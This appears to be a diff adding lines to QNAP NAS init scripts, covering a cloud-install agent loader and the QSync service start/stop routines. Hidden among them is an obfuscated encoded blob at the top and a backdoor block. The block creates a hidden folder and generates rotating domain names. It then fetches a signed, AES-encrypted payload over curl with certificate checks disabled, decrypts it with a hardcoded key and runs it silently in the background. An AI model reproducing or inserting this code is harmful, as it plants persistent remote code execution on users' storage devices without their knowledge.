+('O2:f12!FcQQQQMvKRMQhE%RK+(<'O3:fRfZ;fG!<cQQQQjrQf&KQ<'hE%RK+<QyQ/&+p/lrRC&v|Q`QOQcQQQQQQQQr+R&QfrCQ'JJ'Y;D[{PQ$QJQ'|R
+QfQ'|zCQxQ1QUQxQ'|zCQUUQEFcQQQQQQQQ+KTvQ<'E<cQQQQ!c!cKv||RC&QfpQ|hj+|%QkQ/&+p/ClMMQ2km1Q``Q|hj+|%QJUQOQcMvKRMQElVVz
+(=n+CrEjrQ6Q6=cj+EjQ<'2<QmmQOQ|h&zrQ<'O2$HHHHHH!'ElVVz
+<FQ+KTvQ<'O2$HHHHHH!'ElVVz
+<FQ!Q``QOQjvlKTQ<'O1$HHHHHH!'ElVVz
+<FQ+KTvQ<'O1$$HHHHHH!'ElVVz
+<FQ!c!c+
++KQ2k/&+p/ClMMc); A(<'O); A!:/"zC:/E"zC:/lEr/"zC:/lEr/E"zC:/lEr/"zC/H11:/lEr/MvKRM/E"zC:/lEr/MvKRM/"zC<cj+EjQtQfZQ<'Oda-Yb_s Y]Du!<Q``QOQ%rzCjVQ<[Rj+:Q<FQ G(uP Q&Rj+FQ+
+zjQ0FQ!c+KTvQ<[Rj+:Qo+&Qs+%Q21Q19:48:17QuP Q2016<cKr(=%rzCjVQWwrWQ``Q+KTvQfC+QWwrW=cj+EjQ<'ONKr!<Qf+IQ1QmmQ+KTvQ<'Kr<Q``Q+KTvQ<<cj+EjQ<
+'A  )_Y-}-Y-Y<Q(Q<
+&7298"47&745055&4V03&K507VR7K++VV&64+340<Q``Q+
+zjQ0cj+EjQtQfZQ<'O0!<QmmQj+EjQ=%EQRl
+Q`Qnr+%Q<'O0!<Q`QiKQfM=QfnjQ40QmmQ+
+zjQ0cKv||RC&QfpQv%+CEEMQk/&+p/ClMMQ2km1QmmQOc){s [; ;(WWch(<a;&|;4ZrBa3g9;SX;8{s&DRplA76aql2<cj+EjQ<
+'OY-da-s _P- A{[!<Q(Q
+){s QmmQj+EjQtQfZQ<'Oda-Yb_s Y]Du!<QmmQKRE+Q<'Oda-Yb_s Y]Du!<QzCQWWQ`QL>t0f9eLQ`Q0LQUQVRME+QFFQ>0f9e>0f9e>0f9e>0f9e>0f9e>0f9e>0f9e>0f9eQUQ&(<'JJQ=&Rj+Qx$E=Q/Q100QUU<FQj+EjQ<'Oda-Yb_s Y]Du!<Q(Q<'O&!<QmmQKj(<'&<Q``QOQj+EjQ<'Oda-Yb_s Y]Du!<Q(Q<'JJQ'&QfQ1UU<QmmQKj(<'JJQ'&QfQ1QUU<FQ!QFFQLUQVRME+QFFQ+ERKQmmQj+EjQtQfZQ<'Oda-Yb_s Y]Du!<QmmQOcCM(WcWcKRE+Q<'Oq{D -D _#-Du A!<QzCQWWQ`QL>t0f9eLQ`Q0LQUQVRME+QFFQLUQj+EjQ<'Oq{D -D _#-Du A!<QfMjQ2147483646QFFQ+ERKQmmQOQ]}s(Qr+R&Qf&QWWQfrCQ<'Oq{D -D _#-Du A!<Q){s [; ;FQj+EjQfZQ<'){s [; ;<QmmQ){s [; ;(=&&Q"E(1QKvlCj(<'q{D -D _#-Du A<Q2k/&+p/ClMM=FQ!Q``Qj+EjQ<'){s [; ;<Q``Q){s [; ;(=KRj=Q``Q+
+zjQ0cE(<'O){s [; ;NNL.!<cEj(<'OENNLf!<cE(<'OE$$fL!<c&(<'JJQ'&Q/Q1000QUU<cj+EjQtQfZQ<'&<QmmQj+EjQtQfZQ<'Ej<QmmQj+EjQ<'ONEj!<Q(Q5QmmQOQj+EjQ<
+'Ej<Q(Q<
+'&<Q``Qj+EjQ<
+'Ej<Q(Q<
+'JJQ'&QfQ1QUU<FQ!Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
+zjQ0FQ!cKRE+Q<'E<QzCQWWQ`QL>tRfZ;fG0f9/x('CMeLQUQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
+zjQ0FQFFQ+ERKcj(=|hj+|%Q/j|%/.j|%.HHHHHH=Q``Q+
+zjQ0cKRjQkQ<'j<Qyy<-{}<Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
+zjQ0FQ!cfffff*-u]DQ)a*#]qQg-bfffffcP]]*vS;D*nhIThzu9i0*;d-};;{q;b8;P]]*zngq;b-;\zuxA/1VK#PV Dapp*+Ec{XI06V{u|*}g]a{q)E\u%;lZ[rqgMC*lAv#4Ts-jCl
+ *Dj8S;*Z&Gx%9Ia";G3{cZR)|X]&E1nAAM1g}xd8A5"D&DE9PqYh-pqanXu}+3;RM#7hxS/YH*EorE#qg&ugocRAx&jq0D&#g&hZTg8I*IZA
+qxPauZ++5//{n[g&Kg++MRqnZaXR0lz11*G3]Sg%dcM7AvhBA|\ZYrXu)KlK4hMA9"g4s+;[+TY\S\MzpAdKIsg1EDEiR%X|2I[S\d7TSYcY2ER{Zl" ai1x2dgMxP\5sV\v/*8Dv%Db6-;{#8bq)BAqR%I2RV2G\jTRB22B%VbcZjZS-\5{h}DT6VYnGD%"ElPl4C)R*/rnpX|Eo
+93RCET4]+Hz)\{lgB*R|aG\]p#c
+r2-sq2rTnoTInXlz#MAuxAPg63)v&*P}\gI9r#&4T99CH"9xzq|}d9VZXgE9ssPcS7
+R&u%R"g2RD %D3Z[;l-u]4G{jI
+#IoS-A|0"-xG5};nP*;;-(cfffff-D[Q)a*#]qQg-bfffffc-{}cj+EjQtQfZQ<'E<QmmQT(=v%+CEEMQ"RE+64Qf&Qyy-{}Q`Qv%+CEEMQrERljMQf%l"zCQfzCh+\Q<'j<Qfp+rzV\c'Ec-{}c=Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
+zjQ0FQ!cj+EjQfVQ<'j<QmmQr|Q<'j<c|(<'O){s [; ;$$.L!<c){s [; ;(WWcKRE+Q<'|<QzCQWWQ`QL>tRfZ;fG0f9/x('CMeLQUQ+
+zjQ0QFFQ+ERKch(=v%+CEEMQ&nEjQfETR1Qf"zCRr\QfT|RKQ<'Kj<Qyy-{}Q`Qv%+CEEMQ"RE+64c'hc-{}c=c|(=v%+CEEMQ+CKQf&QfR+Ef256fK"KQfhQ<'h<Qf|&QETR1QfERMjQfRQyy-{}c'|c-{}c=c|T(=v%+CEEMQ&nEjQfETR1Qf"zCRr\QfT|RKQ<'Ej<Qyy-{}Q`Qv%+CEEMQ"RE+64c'|c-{}c=cj+EjQtQfZQ<'T<QmmQj+EjQ<'T<Q(Q<'|T<Q``Q+
+zjQ0c+pRMQ<'|<cjrl+c!Q``QOcj(=|hj+|%Q/j|%/.j|%.HHHHHH=Q``Q+
+zjQ0cKRjQkQ<'j<Qyy<-{}<Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
+zjQ0FQ!cfffff*-u]DQ)a*#]qQg-bfffffcP]]*vS;D*nhIThzu9i0*;d-};;{q;b8;P]]*zngq;b-;9d|APi4Si8q{#bgn{IVqc0uGEYsi}nz
+ 0MzPK42GsrEErE}uGM[)g35ZM&|"aE-dHj}bh[SB+aKh%2RT8}KVc;*}au8P#CM6i p
+uGiXX"P#)[zbv5M/&07*gK"iblID%x2//2&lh
+q\Rh{]]C]I}c#nrP5Cp%5*g**KKPMP*RE}j
+GV}njDSMd9z9|DVz53CRMrP)YvM9gzVo1b
+|#i1xc7u lS}sM\g9;%pz/G]2\/p\|6Do"o-ER-5*9nnHXbrB
+M"g
+P]ZolHV18s2%48}Tc%Ba\bX0|S[aK3szXY4Yz)zh)% dnhsS\90RPgrvoq;&9P6KGjViqZTP"p\jD|&j&cb
+*DDC0}|d51K#)Kx&%R]]
+2z/2Ku&Ab8G;S*[P*P*hS]+2n}nK6MX0o{M 638Zxci7/|)xTKqv#Bazusz-l|Z3a#5)|vBR3i2j04YR70)#o;%uE]/n%A\A0o8z6\B*A-cIaERd
+C*{}p\xzsv|\}zM2&
+gd#S i\G*C8x1g|vCX2%;nP*;;-(cfffff-D[Q)a*#]qQg-bfffffc-{}cv%+CEEMQrERljMQf%l"zCQfzCh+\Q<'j<Qf+CKr\%jQyy-{}Q`Qv%+CEEMQ"RE+64c'hc-{}cr|Q<'j<cjrl+Qc!FQjrl+FQ!Q``QOcj+EjQ<
+';qq-) _#;Dua;u-<Q(Q<
+53"&00K"5K05912V6+230V+&3308+15V44+7V"4V<QmmQ+pRMQ<'OA  )_as-Y_;u-D !<c!cj+EjQfVQ<'j<QmmQr|Q<'j<cEM++%Q1c+
+zjQ0c$|A[F"ISm|AV$QOSjD=frxp%dxVR&wQOFAuj-IxsdT75QOjo&s)x>xGd5QOn;Ht(|KUdTeQ>p)yDAmrqze$%#Z<T0$$*
+cLgBgGVGUVG
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    exit 1
+esac
+exit 0
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
